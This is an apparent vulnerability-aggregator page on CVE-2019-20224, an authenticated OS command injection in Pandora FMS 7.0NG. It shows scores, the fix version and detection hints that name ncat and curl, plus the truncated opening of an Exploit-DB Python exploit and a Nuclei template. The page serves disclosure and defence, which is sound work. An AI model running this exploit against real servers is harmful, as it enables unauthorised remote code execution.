CVE-2019-20224
published 2020-01-09CVE-2019-20224: netflow_get_stats in functions_netflow.php in Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in…
PriorityP273high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
50.62%
98.8th percentile
netflow_get_stats in functions_netflow.php in Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. This issue has been fixed in Pandora FMS 7.0 NG 742.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| artica | pandora_fms | — | — |
| artica | pandora_fms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor POST requests to /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view containing shell metacharacters (e.g., ";, #) in the ip_src parameter, which is the injection point for OS command execution. ↗
- →Shodan/FOFA/Google dork can be used to identify exposed Pandora FMS instances: search for HTTP title 'pandora fms'. ↗
- →The exploit uses a two-step HTTP flow: first a POST login to /pandora_console/index.php?login=1, then a POST to the netflow live view endpoint with the malicious ip_src payload. Correlate these two sequential requests from the same source IP. ↗
- →The draw_button=Draw POST parameter must be present alongside the malicious ip_src value; filter for POST bodies containing both 'draw_button=Draw' and shell metacharacters in 'ip_src'. ↗
- →Outbound ncat/curl connections spawned from the Pandora FMS process (e.g., PHP) may indicate successful exploitation; monitor for child processes of the web server executing network tools like ncat or curl. ↗
- ·Exploitation requires valid authenticated credentials; unauthenticated exploitation is not possible. The vulnerability is in the netflow_get_stats function within functions_netflow.php. ↗
- ·The vulnerability is fixed in Pandora FMS 7.0 NG 742; instances running versions prior to 742 are affected. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8x4w-7qgf-ghm2: functions_netflow
ghsa_unreviewed·2022-05-24·CVSS 8.8
CVE-2020-8947 [HIGH] GHSA-8x4w-7qgf-ghm2: functions_netflow
functions_netflow.php in Artica Pandora FMS 7.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the index.php?operation/netflow/nf_live_view ip_dst, dst_port, or src_port parameter, a different vulnerability than CVE-2019-20224.
GHSA
GHSA-gv9r-c8f3-vqh2: netflow_get_stats in functions_netflow
ghsa_unreviewed·2022-05-24
CVE-2019-20224 [HIGH] GHSA-gv9r-c8f3-vqh2: netflow_get_stats in functions_netflow
netflow_get_stats in functions_netflow.php in Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
No detection rules found.
Exploit-DB
Pandora 7.0NG - Remote Code Execution
exploitdb·2020-01-10·CVSS 8.8
CVE-2019-20224 [HIGH] Pandora 7.0NG - Remote Code Execution
Pandora 7.0NG - Remote Code Execution
---
# Exploit Title: Pandora 7.0NG - Remote Code Execution
# Date: 2019-11-14
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2019-20224
# Vendor Homepage: https://pandorafms.org/
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Version: v7.0NG
# Tested on: CentOS 7.3 / PHP 5.4.16
#!/usr/bin/python3
import requests
import sys
if len(sys.argv) != 6:
print("[+] Usage : ./exploit.py target username password ip port")
exit()
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = int(sys.argv[5])
request = requests.session()
login_info = {
"nick": username,
"pass": password,
"login_button": "Login"
}
login_request = request.post(
target+"/pandora_console/index.php?login=1
Nuclei
Pandora FMS 7.0NG - Remote Command Injection
nuclei·CVSS 8.8
CVE-2019-20224 [HIGH] Pandora FMS 7.0NG - Remote Command Injection
Pandora FMS 7.0NG - Remote Command Injection
Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
Template:
id: CVE-2019-20224
info:
name: Pandora FMS 7.0NG - Remote Command Injection
author: ritikchaddha
severity: high
description: |
Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system.
remediation: This issue has been fixed in Pandora FMS 7.0 NG 742.
reference:
- https:/
Fortinet
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
blogs_fortinet·2022-10-21·CVSS 9.8
CVE-2022-22954 [CRITICAL] Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
FORTIGUARD LABS THREAT RESEARCH
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
By Cara Lin | October 21, 2022
In April, VMware patched a vulnerability CVE-2022-22954. It causes server-side template injection because of the lack of sanitization on parameters “deviceUdid” and “devicetype”. It allows attackers to inject a payload and achieve remote code execution on VMware Workspace ONE Access and Identity Manager. FortiGuard Labs published Threat Signal Report about it and also developed IPS signature in April.
We observed attacks in the wild since then. Most of the payloads focus on probing a victim’s sensitive data, for example, passwords, hosts file, etc. But in August, there were a few particular payloads, which got our interest. They had th
Greynoiseio
NoiseLetter February 2026
blogs_greynoiseio
NoiseLetter February 2026
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/155897/Pandora-7.0NG-Remote-Code-Execution.htmlhttps://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view?usp=sharinghttps://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9https://pandorafms.com/downloads/solved-pandorafms-742.mp4https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/http://packetstormsecurity.com/files/155897/Pandora-7.0NG-Remote-Code-Execution.htmlhttps://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view?usp=sharinghttps://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9https://pandorafms.com/downloads/solved-pandorafms-742.mp4https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
2020-01-09
Published